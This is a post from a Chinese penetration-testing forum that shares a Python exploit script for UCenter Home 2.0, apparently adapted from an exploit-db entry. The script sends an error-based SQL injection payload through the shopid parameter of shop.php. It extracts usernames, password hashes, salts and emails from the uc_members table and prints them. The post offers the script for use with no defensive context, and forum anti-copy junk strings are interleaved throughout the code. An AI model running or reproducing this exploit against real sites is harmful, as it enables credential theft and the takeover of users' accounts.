找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2384|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl! Z3 [/ S$ N$ `0 Q+ G9 F

! }; |0 b* T6 s) V( U" H4 O3 }# ~: Q8 O' w7 a
#!/usr/bin/env python  
( l+ q! d$ G9 h& x& K# F7 @ + C- O& ~- d6 a* T3 k! S
import sys  
, J# x* l% V% G5 j4 p9 yimport urllib2  
1 l# d1 Y) ^* ?import re  
4 c! m% M, {) @1 ~0 w5 j$ U 5 h2 g! q& y- O2 V$ r
def info():  3 a, I/ I, O& s; p0 k+ C: Q
    print 'From:http://www.exploit-db.com/exploits/14997/' 3 n8 J* I! c! j3 [' ~3 A
    print 'http://www.hake.cc/Web_loudong/'
. M( P- I4 p# l    print 'changed:qiaoy'  
8 t7 b5 h6 S% P& ?# _4 d    print 'exp:'  
+ D" b# V! ]$ y    print ' ./UCenter_Home_2.0.py site'  ( r9 T6 H; d* _! h

4 y( A: r5 h! f' z" W' Wdef main():  
! h9 n  d! t2 N    if len(sys.argv) != 2:  
/ y! ^/ t: u# l. N/ {        info()  1 L2 Z& T6 b- x) F
    else:  
5 Y1 x( C$ p' U0 U( @: l" f        site = sys.argv[1]  ! o/ z/ }0 g% t$ M( }0 U2 U6 v
        if site[0:7] == 'http://':  
6 P6 w  A0 P. L# Y& N0 l% ?            sitesite =site  3 E. Z/ U7 p6 h# u
        elif site[0:8] == 'https://':  
. A) {; x. X1 L: ?, @, z: F            sitesite = site  
. v& ~6 m  |; e* b4 X        else:  + Z! e: h* x3 i
            site = 'http://'+site  9 k* B0 M' J: j  |
        try:  : J' F) c" v5 [5 f
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  & @- q- l) C3 x3 z% B* R) e
            Value = urllib2.urlopen(url).read()  
- W- l1 `' k. p" E) `4 u            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
% t% k) {( g+ M: \8 O( {            hacked = Msg.split(':')  " f( D& F! z- a8 b; k9 P
            print 'Name:    '+hacked[1]  7 B; e* l- y  i, R: e( p
            print 'Passwd:  '+hacked[2]  1 `. T" W0 ?* b) S3 x/ E
            print 'salt:    '+hacked[3]  
6 U" v, T) M- X  G            print 'email:   '+hacked[4]  : j/ q5 L1 I: J4 P/ g
        except:  
3 \" K1 e$ c" ]7 C            print 'Sorry,I can\'t work............'  
, {1 S- q/ F5 \/ x  `& E! t ; g$ w# |/ O+ D% T) H# X. @7 _$ E
if __name__ == '__main__':  
' O% c  W3 [" p" j; N/ u    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表